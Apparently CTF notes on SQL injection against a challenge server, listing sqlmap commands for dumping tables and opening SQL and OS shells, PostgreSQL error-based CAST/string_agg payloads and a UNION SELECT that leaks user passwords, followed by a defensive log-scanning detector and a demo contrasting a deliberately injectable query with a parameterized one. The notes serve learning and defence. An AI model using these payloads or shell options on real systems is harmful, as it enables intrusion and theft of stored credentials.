sqlmap saves the info it gathers on each target under ~/.local/share/sqlmap/output/

sqlmap -u 'http://challs.crate.nu:8901/?search=a' --dbs
sqlmap -u 'http://challs.crate.nu:8901/?search=a' -D public --tables
sqlmap -u 'http://challs.crate.nu:8901/?search=a' -D public -T flags --columns
sqlmap -u 'http://challs.crate.nu:8901/?search=a' -D public -T flags --dump

sqlmap -u 'http://challs.crate.nu:8901/?search=a' --sql-shell
sqlmap -u 'http://challs.crate.nu:8901/?search=a' --os-shell

sqlmap -u 'http://challs.crate.nu:8901/?search=a' --current-user
sqlmap -u 'http://challs.crate.nu:8901/?search=a' --banner
sqlmap -u 'http://challs.crate.nu:8901/?search=a' --users

--level=1 tests a few basic payloads
--level=5 tests a very comprehensive set of payloads
--risk=1 is the default
--risk=3 has a higher chance of corrupting the database

Levels

1 A limited number of tests/requests; GET and POST parameters will be tested (default)
2 Test cookies
3 Test cookies plus User-Agent/Referer
4 As above plus null values in parameters and other bugs
5 An extensive list of tests with an input file for payloads and boundaries

Risks

1 Quick, unnoticeable tests (default)
2 Tests that involve lengthy, heavy data processing, such as time-based SQLi
3 Adds OR-based SQLi and possible data manipulation
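Because levels 2 and 3 move the payloads out of the query string and into cookies, User-Agent and Referer, a log review that only greps the URL misses most of a scan. The following is an added example (not part of these notes or of sqlmap) that scans constructed access-log lines for the probe shapes used on this page (CAST/string_agg error-based probes, information_schema enumeration, stacked queries, UNION SELECT, OR 1=1 and sleep-based payloads) in every field sqlmap touches. The log format is assumed to be the common "combined" format with an extra quoted Cookie field appended; the sample lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# Probe shapes taken from the payloads discussed in these notes. Tune to your app's
# real traffic: a legitimate search for "cast(" would trip the third pattern.
SQLI_PATTERNS = [
    re.compile(r"\bunion\b.{0,40}\bselect\b", re.I),            # UNION SELECT
    re.compile(r"information_schema\.", re.I),                   # schema enumeration
    re.compile(r"\bcast\s*\(", re.I),                            # error-based CAST trick
    re.compile(r"string_agg\s*\(", re.I),                        # PostgreSQL aggregation
    re.compile(r"';\s*select\b", re.I),                          # stacked query after a closed literal
    re.compile(r"\bor\b\s+\d+\s*=\s*\d+", re.I),                 # OR 1=1 boolean probes (risk 3)
    re.compile(r"\bpg_sleep\s*\(|\bsleep\s*\(|waitfor\s+delay", re.I),  # time-based (risk 2)
]
SQLMAP_UA = re.compile(r"sqlmap", re.I)

# Assumed format: combined log plus an optional trailing quoted Cookie field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"(?: "(?P<cookie>[^"]*)")?$'
)


def classify(line):
    """Return a list of (field, reason) hits for one log line; [] means nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return [("parse", "unparsed line")]
    hits = []
    # Levels 1-3 place payloads in the query string, cookies, User-Agent and Referer,
    # so all four are decoded and scanned rather than just the URL.
    fields = {
        "path": unquote_plus(m["path"]),
        "cookie": unquote_plus(m["cookie"] or ""),
        "ua": m["ua"],
        "referer": unquote_plus(m["referer"]),
    }
    if SQLMAP_UA.search(fields["ua"]):
        hits.append(("ua", "sqlmap user-agent"))
    for name, value in fields.items():
        for pat in SQLI_PATTERNS:
            if pat.search(value):
                hits.append((name, pat.pattern))
    return hits


def flagged(lines):
    """Return [(line_number, hits)] for every line with at least one hit."""
    return [(i, h) for i, line in enumerate(lines, 1) if (h := classify(line))]


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    # benign search
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?search=apple HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # URL-encoded CAST/string_agg probe in the query string, server answered 500
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /?search=a%25%27%3B+SELECT+1+WHERE+42%3DCAST%28%28SELECT+'
    'string_agg%28table_name%2C+%27%2C+%27%29+FROM+information_schema.tables%29+AS+INT%29%3B-- HTTP/1.1" 500 0 '
    '"-" "Mozilla/5.0"',
    # sqlmap default User-Agent plus a level-2 style cookie payload
    '203.0.113.9 - - [01/Jan/2024:10:00:02 +0000] "GET /?search=a HTTP/1.1" 200 512 "-" '
    '"sqlmap/1.7 (https://sqlmap.org)" "session=abc%27+OR+1%3D1--"',
]

if __name__ == "__main__":
    for lineno, hits in flagged(SAMPLE_LOG):
        print(f"line {lineno}:")
        for field, reason in hits:
            print(f"  {field}: {reason}")
```

Pair the pattern hits with the response status: the error-based probes on this page only work because the 500 carries the database error back to the client, so a burst of 500s from one IP on a search endpoint is itself a signal.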

Manual payloads

# When a cast fails, the database error usually echoes the offending value (something like "BLAH could not be cast to type foo"),
# so if you concatenate the names of all tables into one long string and cast that to an INT, the error message hands you the table list:

a%'; SELECT 1 WHERE 42=CAST((SELECT string_agg(table_name, ', ') FROM information_schema.tables) AS INT); SELECT 1 WHERE true or title ilike '
a%'; SELECT 1 WHERE 42=CAST((SELECT string_agg(column_name, ', ') FROM information_schema.columns WHERE table_name = 'flags') AS INT); SELECT 1 WHERE true or title ilike '
a%'; SELECT 1 WHERE 42=CAST((SELECT string_agg(t::text, ', ') FROM flags AS t) AS INT); SELECT 1 WHERE true or title ilike '

# UNION SELECT is also very useful:
SELECT title, text FROM articles UNION SELECT username, password FROM users;
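The reason the UNION line above (and the stacked CAST probes) work at all is that the search term is spliced into the SQL text. The following is an added example, not code from these notes, that builds a constructed SQLite in-memory copy of the articles/users tables, runs the UNION payload against a string-concatenated query and against a bound-parameter query, and shows that only the concatenated one returns the users row. The stacked CAST payloads are PostgreSQL-specific and are not reproduced here; SQLite's execute() refuses multiple statements and has no string_agg.

```python
import sqlite3


def make_db():
    """Constructed in-memory schema mirroring the articles/users tables in the note."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles (title TEXT, text TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO articles VALUES ('apple pie', 'recipe body'), ('banana bread', 'another body');
        INSERT INTO users VALUES ('admin', 'hunter2-hash');
    """)
    return conn


def search_vulnerable(conn, term):
    # The untrusted term is pasted into the SQL text, so a quote in the input
    # closes the literal and everything after it is parsed as SQL.
    sql = f"SELECT title, text FROM articles WHERE title LIKE '{term}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    # Bound parameter: the driver passes the term as data, never as SQL text,
    # so the same payload is just a search string that matches nothing.
    sql = "SELECT title, text FROM articles WHERE title LIKE ? || '%'"
    return conn.execute(sql, (term,)).fetchall()


# The UNION payload from the note; the trailing comment swallows the %' the query appends.
PAYLOAD = "zzz' UNION SELECT username, password FROM users --"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", search_vulnerable(db, PAYLOAD))   # users row leaks through
    print("safe:      ", search_safe(db, PAYLOAD))         # nothing
    print("normal:    ", search_safe(db, "apple"))
```

The column count has to line up for a UNION to parse, which is why the note pairs the two-column articles query with two columns from users; with a parameterized query the count never matters because the term never reaches the parser.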